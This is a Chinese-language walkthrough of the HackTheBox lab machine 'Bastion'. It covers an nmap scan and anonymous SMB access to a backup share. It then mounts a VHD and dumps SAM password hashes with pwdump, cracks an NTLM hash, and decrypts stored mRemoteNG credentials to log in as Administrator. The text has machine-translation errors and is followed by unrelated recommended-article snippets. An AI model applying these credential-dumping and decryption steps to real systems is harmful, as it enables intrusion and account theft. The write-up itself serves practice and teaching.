开干,第一步是对机器进行Nmap查找正在运行的服务:

root@kali://root/Documents/bastion# cat scan
# Nmap 7.70 scan initiated Wed Aug  7 10:36:31 2019 as: nmap -A -oN scan -p- 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.032s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=34774%PV=Y%DS=2%DC=T%G=Y%TM=5D4A9C1A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%II=I%TS=A)SEQ(SP=103%GCD
OS:=1%ISR=10E%CI=I%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10E%TS=A)OPS(O1=M54DNW8ST
OS:11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DS
OS:T11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=8
OS:0%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-07T11:38:29+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-07 10:38:26
|_  start_date: 2019-08-07 09:01:18TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   31.07 ms 10.10.12.1
2   31.11 ms 10.10.10.134OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  7 10:38:34 2019 -- 1 IP address (1 host up) scanned in 123.32 seconds

从输出中可以看到,我们拥有SSH和一些SMB共享。然后,我运行smbmap来查找一些SMB共享可用:

root@kali:~/Documents/bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445  Name: 10.10.10.134                                      Disk                                                    Permissions----                                                    -----------ADMIN$                                              NO ACCESSBackups                                             READ, WRITEC$                                                  NO ACCESSIPC$                                                READ ONLY

我们有两个共享R /W。这些是备份和IPC。备份听起来是最有前途的,所以我首先挂载了此共享,然后开始浏览文件以查看是否突出。我在\ WindowsImageBackup \ L4mpje-PC \备份2019-02-22 124351 \文件夹中找到了一些VHD文件。

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir.                                   D        0  Fri Feb 22 12:45:32 2019..                                  D        0  Fri Feb 22 12:45:32 20199b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Wed Aug  7 15:34:56 20199b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5451853824  Wed Aug  7 15:37:53 2019BackupSpecs.xml                     A     1186  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 12:45:32 2019cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 12:45:32 20197735807 blocks of size 4096. 2767174 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>

我下载了最大的VHD文件,因为它可能包含一些有趣的内容。下载完成后,我使用vhdimount将文件挂载到/ mnt / test

root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# vhdimount 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd /mnt/test/
vhdimount 20190309
root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# cd /mnt/test/
root@kali:/mnt/test# ls
vhdi1

从输出中可以看到,这已经在/ mnt / test中生成了一个图像文件。现在需要挂载该文​​件,刹车可以访问文件系统。在映像文件上运行fdisk -l为我们提供了更多信息。

root@kali:/mnt/test# fdisk -l vhdi1
Disk vhdi1: 100.1 MiB, 104970240 bytes, 205020 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000Device     Boot Start    End Sectors  Size Id Type
vhdi1p1           128 204927  204800  100M  7 HPFS/NTFS/exFAT

现在我们知道了文件系统的起点和合并大小。我们可以分割出分区相连其安装。

root@kali:/mnt/test# mount -o ro,noload,offset=65536 vhdi1 /mnt/just/

因此,在这种情况下,它是128 * 512 = 65536。

然后,我转到/ mnt / just / Windows / System32 / config,以从SAM文件中转存储密码哈希。我使用pwdump做到了这一点。

root@kali:/mnt/tmp# cd /mnt/just/Windows/System32/config
root@kali:/mnt/just/Windows/System32/config# pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

您无法使用此方法转储管理员哈希。但是,存在L4mpje NTLM哈希。我复制了哈希副本其输入到hashkiller.co.uk中。预计算的哈希成功返回。

Cracker Results:26112010952d963c8dc4217daec986d9 NTLM bureaulampje

现在,使用此密码,我可以通过SSH登录到计算机,浏览到桌面并捕获用户标志。

root@kali:/mnt/just/Windows/System32/config# ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password: Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.                                                              l4mpje@BASTION C:\Users\L4mpje>   l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                         l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                        Volume in drive C has no label.                                                                                  Volume Serial Number is 0CB3-C487                                                                                Directory of C:\Users\L4mpje\Desktop                                                                             22-02-2019  16:27    <DIR>          .
22-02-2019  16:27    <DIR>          ..
23-02-2019  10:07                32 user.txt                                                                      1 File(s)             32 bytes                                                                     2 Dir(s)  11.383.808.000 bytes free                                                                l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt
[REDACTED]

下一步是特权升级,以尝试获取管理员提示。我在机器上四处查找,发现已安装了所谓的mRemoteNG的软件。这是欺诈子,RDP,VNC等软件的前端,并且能够保存经常访问的远程会话但是,有关有关一个问题是发现它存储的初始化不安全。可以使用脚本来输入加密的密码并输出纯文本结果。

密码存储在AppData \漫游\ mRemoteNG中的confCons.xml XML文件中。

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                      Volume in drive C has no label.                                                                                  Volume Serial Number is 0CB3-C487                                                                                Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                           22-02-2019  15:03    <DIR>          .
22-02-2019  15:03    <DIR>          ..
22-02-2019  15:03             6.316 confCons.xml
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  15:03                51 extApps.xml
22-02-2019  15:03             5.217 mRemoteNG.log
22-02-2019  15:03             2.245 pnlLayout.xml
22-02-2019  15:01    <DIR>          Themes                                                                        14 File(s)         76.577 bytes                                                                     3 Dir(s)  11.334.410.240 bytes free

我打开confCons.xml来检索加密的密码。它在顶部附近可见,并以base64编码。

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6"><Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit"

然后,我使用mremoteng_decrypt.py从XML文件解密base64编码的密码。

root@kali:~/Documents/bastion# ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
root@kali:~/Documents/bastion#

使用此密码,我可以通过SSH重新登录,但是这次是Administrator。

root@kali:~/Documents/bastion# ssh administrator@10.10.10.134
administrator@10.10.10.134's password: Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.                                                              administrator@BASTION C:\Users\Administrator>cd Desktop                                                           administrator@BASTION C:\Users\Administrator\Desktop>more root.txt
[REDACTED]

关注微信公众号:知柯信息安全 获取更多资讯
文章:Xtrato
排版:知柯-匿名者

对HackTheBox里面的Bastion测试相关推荐

  1. 对HackTheBox里面的Netmon进行攻破

    废话不多说直接执行Nmap扫描的第一步是查看计算机正在运行的服务类型: nmap -p- -sV -O 10.10.10.152 Starting Nmap 7.70 ( https://nmap.o ...

  2. 【转】详谈for循环里面的break和continue语句

    https://www.jb51.net/article/119099.htm 转载  更新时间:2017年07月20日 07:53:06   投稿:jingxian   我要评论 下面小编就为大家带 ...

  3. sql server2016里面的json功能 - 转

    测试一下基本的,从查询结果里面构造一个json 的格式 create table t1(ID int identity,name nvarchar(50),Chinese int ,Math int) ...

  4. unity5.4.3p2里面的AssetBundle打包流程

    unity5.4.3p2里面的AssetBundle打包流程,相比之前unity4.x的打包简单了许多,Unity4.X中打包的时候需要自己去管理依赖关系,各种BuildPipeline.PushAs ...

  5. 音频系统,Alsa 里面的buff 是怎么计算的?

    相关文章 (干货)Ai音箱和Linux音频驱动小谈 Linux ALSA 图解 我在MTK平台下调试音频ALSA 我们知道声音是模拟信号,模拟信号转成数字信号就一定有大小,既然有大小,那我们就需要开辟 ...

  6. 手机相机里面的m_荣耀V30 PRO详细评测:Matrix Camera相机矩阵开启5G视频时代

    [IT168 评测]随着手机摄像头的配置越来越高,手机上已经能实现不俗的拍照效果,甚至超越了数码相机(DC)成为了人们最常用的拍照工具.进入今年的下半年,随着5G的商用,手机厂商对于手机的摄像头功能优 ...

  7. 如何将lnmp 0.5里面的php5.2.14升级到php 5.3.3???

    如何将lnmp 0.5里面的php5.2.14升级到php 5.3.3??? --------------- 注意:不要百度Google找到的教程发来 那个升级不了::: CentOS5.3的php版 ...

  8. [转]如何让虚拟目录里面的webconfig不继承网站

    如何让虚拟目录里面的webconfig不继承网站 今天要部署一个网站和一个和网站相关的webservices接口,我把网站部署后,就把WEB接口作为它下面的一个虚拟目录来处理了,这样他们可以共享一个域 ...

  9. 占用率_有问有答:任务管理器里面的GPU占用率到底是怎么算的?

    从总体上来说,Windows 10是一个好系统,虽然我们天天戏称它为"Bug 10",但不可否认的是,从立项以来,开发团队就一直在努力为它加入新的功能,其中有不少是相当实用的,比如 ...

  10. koa2 中间件里面的next到底是什么

    koa2短小精悍,女人不爱男人爱. 之前一只有用koa写一点小程序,自认为还吼吼哈,知道有一天某人问我,你说一下 koa或者express中间件的实现原理.然后我就支支吾吾,好久吃饭都不香. 那么了解 ...

最新文章

  1. Blender数字雕刻终极指南学习教程
  2. Linux学习笔记5月22日任务
  3. 你应该将应用迁移到Spring 4的五个原因
  4. java运行安全_Java运行时环境
  5. Apple 低延迟HLS分析
  6. 土方工程量计算表格excel_土方量调配表(Excel公式版)
  7. mysql处理字符串函数,MySQL常用函数--字符串处理
  8. DB9接口详解---DB9引脚在 UART,CAN,RS485中的定义
  9. 大漠插件注册使用方法教程
  10. 《三国演义》分章节梗概
  11. 【数值计算】计算机中的数值计算
  12. web service压测工具:siege安装及使用介绍
  13. 这一篇带你学点儿 Java8 中的流式数据处理
  14. egg 添加 samesite=none, 出现感叹号
  15. 使用Canal同步数据到ES
  16. 基金训练营学习笔记3-股票基金
  17. Android视频编辑器(三)给本地视频加水印和美颜滤镜
  18. workbench 闪退或停止工作
  19. 《第一行代码》第三版笔记
  20. 20℃ 怀念 盛夏未央

热门文章

  1. 湘潭大学c语言大作业难过吗,C语言程序设计参考答案(湘大出版社)
  2. 0704第五讲异常处理
  3. gitter 卸载_最佳的Gitter渠道:数据科学和机器学习
  4. Unity3D游戏开发引擎的产品特点
  5. linux安装教程黑屏,解决SUSE Linux安装黑屏
  6. 饥荒联机版服务器控制台本地和在线,饥荒联机版服务器代码有哪些_服务器常用指令一览_3DM单机...
  7. 技术团队人效计算公式
  8. 牛客小白月赛61-C-小喵觅食
  9. 2021东阳高考成绩查询,2021金华市地区高考成绩排名查询,金华市高考各高中成绩喜报榜单...
  10. 网站服务器日志包含什么,查看网站日志有什么作用?